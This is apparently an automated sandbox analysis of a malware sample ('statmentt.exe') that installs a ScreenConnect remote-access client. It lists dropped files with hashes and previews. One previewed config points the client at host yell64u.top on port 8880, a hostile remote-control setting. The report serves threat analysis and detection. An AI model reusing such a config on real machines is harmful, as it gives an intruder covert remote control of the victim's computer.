                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):746
                                                                                            Entropy (8bit):5.349174276064173
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                            MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                            SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                            SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                            SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                            Process:C:\Users\user\Desktop\statmentt.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):321
                                                                                            Entropy (8bit):5.36509199858051
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                            MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                            SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                            SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                            SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                            Malicious:true
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):1086792
                                                                                            Entropy (8bit):7.793516535218678
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                            MD5:30CA21632F98D354A940903214AE4DE1
                                                                                            SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                            SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                            SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):234
                                                                                            Entropy (8bit):4.977464602412109
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                            MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                            SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                            SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                            SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                            Malicious:false
                                                                                            Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):4.62694170304723
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                            MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                            SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                            SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                            SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36864
                                                                                            Entropy (8bit):4.340550904466943
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                            MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                            SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                            SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                            SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):57344
                                                                                            Entropy (8bit):4.657268358041957
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                            MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                            SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                            SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                            SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):176128
                                                                                            Entropy (8bit):5.775360792482692
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                            MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                            SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                            SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                            SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):548864
                                                                                            Entropy (8bit):6.031251664661689
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                            MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                            SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                            SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                            SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):11776
                                                                                            Entropy (8bit):5.267782165666963
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                            MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                            SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                            SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                            SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1721856
                                                                                            Entropy (8bit):6.639136400085158
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                            MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                            SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                            SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                            SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                            Process:C:\Users\user\Desktop\statmentt.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):431086
                                                                                            Entropy (8bit):6.617567524928143
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:h1uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv6ssM:7uH2anwohwQUv5uH2anwohwQUv6ssM
                                                                                            MD5:7BB98CED2F4D6D63C34FD0465943DD5B
                                                                                            SHA1:B9612C88F44D292D3EBEB70482B4E24B9089836B
                                                                                            SHA-256:8DC6BA6DFE502647E8004CF6E0784D641050C2C1323EA65E578480BF366F6014
                                                                                            SHA-512:5C9321601429EE7C96C6800BC03D8F0C11955F3834524377089A791D6FAFCA84E3B583126ACD036B13046365A5F4533AE6445A99FD04582245DDC0332F336DAA
                                                                                            Malicious:false
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIF458.tmp, Author: Joe Security
                                                                                            Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):207360
                                                                                            Entropy (8bit):6.573348437503042
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):207360
                                                                                            Entropy (8bit):6.573348437503042
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.1626473333022682
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:JSbX72FjCuAGiLIlHVRpMh/7777777777777777777777777vDHFi6nq+lp3Xl0G:JLQI5ck6nhb6F
                                                                                            MD5:D865E01106131A766EC7051CDC3D356C
                                                                                            SHA1:EF6CE74C77679AB99E531E63AB395A24A29B7282
                                                                                            SHA-256:EF51C21889F88F05CB45FD5349ACD05417036A0EDC5B6F9CF1BCED429F4CCB3A
                                                                                            SHA-512:C864AEF5D3A74D2642AB23D59D855A6D999606F3E86CD5389954B147E649557A2C6A228C47A94AB52FD9AD8318B80D5BE356ADC33CA04630EF3D09C001EC1C6B
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.796581217563304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
                                                                                            MD5:CC2ADC2329B5D81AE3EDBAB92BACB16B
                                                                                            SHA1:D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
                                                                                            SHA-256:3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
                                                                                            SHA-512:0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):7668
                                                                                            Entropy (8bit):7.864444854228408
                                                                                            Encrypted:false
